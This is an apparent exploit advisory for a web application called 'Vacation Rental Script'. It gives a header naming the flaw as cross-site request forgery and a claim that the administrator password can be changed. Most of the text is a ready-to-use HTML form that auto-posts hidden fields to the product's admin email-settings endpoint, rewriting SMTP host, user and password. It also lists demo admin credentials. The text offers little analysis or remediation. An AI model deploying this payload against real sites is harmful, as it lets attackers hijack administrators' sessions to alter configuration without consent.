< ------------------- header data start ------------------- >


#############################################################

# Application Name : Vacation Rental Script

# Vulnerable Type : XSRF

# Infection : Administrator password Change Edilebilir.

# author : BARCOD3 - Bug Researchers

# Demo : http://www.vacationrentalscript.com/demo/

#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >
<h3>BARCOD3</h3>
<form id=settings_emails method=post action=http://www.vacationrentalscript.com/demo/admin/settings/emails/emails enctype=multipart/form-data>
<input class=text type=hidden name=smtp_host id=smtp_host value=localhost />
<input class=text type=hidden name=smtp_user id=smtp_user value=username />
<input class=text type=password name=smtp_password id=smtp_password value=passWORD />
<input class=short-text type=hidden name=smtp_port id=smtp_port value=25 />
<input class=short-text type=hidden name=delete_old_system_alerts_days id=delete_old_system_alerts_days value=1 />
<input class=btn-orange type=submit value=Save settings id=submit name=submit />
</form>

*Note ;

Demo User; admin
Demo pass; admin
< -- bug code end of -- >